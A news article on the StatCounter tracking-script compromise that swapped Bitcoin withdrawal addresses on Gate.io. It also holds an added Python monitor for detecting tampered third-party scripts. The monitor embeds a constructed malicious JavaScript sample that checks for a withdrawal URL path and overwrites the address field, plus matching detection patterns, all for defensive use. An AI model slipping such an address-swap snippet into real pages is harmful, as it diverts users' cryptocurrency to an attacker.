Security breach at StatCounter

Hackers compromised this tool to hijack Bitcoin transactions on the Gate.io platform

Digital forensics specialists from the International Institute of Cyber Security report a security breach at StatCounter, one of the largest web analytics platforms on the Internet. During the attack, hackers injected malicious code into the tracking script on the company’s main site.

According to Matthieu Faou, a researcher in cybersecurity, malware and digital forensics, the malicious code used in the attack is capable of hijacking Bitcoin transactions made through the web interface of the cryptocurrency exchange Gate.io.

“We contacted the StatCounter operators but they haven’t responded yet”, said Faou in a security advisory. “The JavaScript file in http://www.statcounter[.]com/counter/counter.js is still compromised”.

The researcher says that the malicious code was first added to the StatCounter script last weekend, on Saturday, November 3rd, and that it was still active at the time of writing, as shown in screenshots of the site.


This JavaScript file is the cornerstone of the StatCounter analytics service: companies load it on their sites to track visits and review traffic history. According to cybersecurity and digital forensics specialists, more than 680k websites currently load the company’s tracking script.

But according to Faou, none of these companies have to worry, at least for now, because the malicious code inserted into the StatCounter tracking script targets users of a single site: the cryptocurrency exchange platform Gate.io.

The researcher explains that the malicious code inspects the current page URL and does not activate unless that URL contains the path ‘MyAccount/remove/BTC’. Faou says that the only website he identified with this URL pattern was Gate.io, a major cryptocurrency exchange platform, currently ranked 39th in the CoinMarketCap classification.

The URL the malicious code targets is part of a user’s account control panel; more specifically, it is the page where users make Bitcoin transfers. The researcher concludes that the purpose of the malicious code is to silently replace any Bitcoin address that the user enters on that page with one controlled by the attacker.
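The behaviour described above (a third-party script that changes without notice, inspects the page URL for an account path, and writes a hard-coded Bitcoin address into a form field) is something a site owner can watch for on their own side. The following is an added example, not code from the article, from ESET or from StatCounter: a small monitor that compares a fetched copy of a third-party script against a known-good baseline hash and, when the body has changed, runs a few heuristics for the indicators the article names. The two script bodies are constructed samples (the tracking snippet is invented and the attacker address is an obvious placeholder); only the path literal ‘MyAccount/remove/BTC’ is taken from the article.

```python
import hashlib
import re
from typing import Dict, List

# Constructed sample: a benign analytics snippet as a site owner might have
# recorded it when establishing a baseline (not StatCounter's real code).
BASELINE_SCRIPT = """
var sc_project=12345; var sc_invisible=1;
(function(){ var img=new Image();
  img.src="//c.example-analytics.test/t.php?p="+sc_project; })();
"""

# Constructed sample: the same snippet with an appended payload shaped like the
# article's description: gated on a withdrawal path, rewriting an address.
# The Bitcoin address below is a made-up placeholder, not a real IoC.
TAMPERED_SCRIPT = BASELINE_SCRIPT + """
if (document.location.href.indexOf("MyAccount/remove/BTC") > -1) {
  var f = document.getElementById("withdraw_address");
  if (f) { f.value = "1FakeAttackerAddrPLACEHxxxxxxxx"; }
}
"""

# Paths that belong to a user's withdrawal flow; a tracking beacon has no
# legitimate reason to check for them. The first is the one from the article.
SENSITIVE_PATH_PATTERNS = [
    re.compile(r"MyAccount/remove/BTC", re.I),
    re.compile(r"/withdraw/", re.I),
]
URL_INSPECTION = re.compile(r"location\.href|location\.pathname|document\.URL")
# Quoted literal shaped like a legacy (P2PKH/P2SH) Bitcoin address; bech32
# addresses are omitted here for brevity.
BTC_ADDRESS_LITERAL = re.compile(r"[\"'][13][a-km-zA-HJ-NP-Z1-9]{25,34}[\"']")
FIELD_WRITE = re.compile(r"\.value\s*=")


def sha256_hex(body: str) -> str:
    """Hash of the script body as fetched; stored once as the baseline."""
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


def suspicious_indicators(body: str) -> List[str]:
    """Heuristics for the payload pattern described in the article."""
    findings = []
    if URL_INSPECTION.search(body):
        findings.append("inspects page URL")
    for pattern in SENSITIVE_PATH_PATTERNS:
        if pattern.search(body):
            findings.append("gated on sensitive path: " + pattern.pattern)
    if BTC_ADDRESS_LITERAL.search(body):
        findings.append("contains hard-coded Bitcoin-address-like literal")
    if FIELD_WRITE.search(body):
        findings.append("writes to a form field value")
    return findings


def assess(body: str, baseline_hash: str) -> Dict[str, object]:
    """Compare a freshly fetched script against the baseline.

    'ok'      : body unchanged since baseline.
    'changed' : body changed but no indicators; a vendor update to review.
    'alert'   : body changed and carries indicators; treat as a compromise.
    """
    changed = sha256_hex(body) != baseline_hash
    indicators = suspicious_indicators(body) if changed else []
    if changed and indicators:
        verdict = "alert"
    elif changed:
        verdict = "changed"
    else:
        verdict = "ok"
    return {"verdict": verdict, "changed": changed, "indicators": indicators}


if __name__ == "__main__":
    baseline = sha256_hex(BASELINE_SCRIPT)
    for name, body in (("baseline", BASELINE_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        result = assess(body, baseline)
        print(name, result["verdict"], result["indicators"])
```

In practice the body would be fetched from the vendor URL on a schedule and the baseline hash stored when the script was first reviewed. A legitimate vendor update produces “changed” with no indicators and should be diffed by a person before the baseline is refreshed; the heuristics are deliberately narrow to the pattern in this incident, so an “ok” verdict only means the file is byte-identical to what was last reviewed.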

“A different Bitcoin address is used for each victim. We could not find the main Bitcoin address of the attackers, therefore we could not pivot on the blockchain transactions and find related attacks”, said Faou, suggesting that it is still impossible to determine the amount of Bitcoin that the group could have stolen so far.

Although it has declined to comment on the incident, Gate.io has already removed the StatCounter script from its website. Nevertheless, questions remain about how many Gate.io users might have been affected by this security incident and what steps the platform could take to compensate them.

This is the latest incident in a long list of supply-chain attacks carried out through third-party JavaScript code loaded into legitimate sites. In recent years, threat actors have compromised several online services to load cryptocurrency-mining scripts or payment-card skimming code into the browsers of unsuspecting users.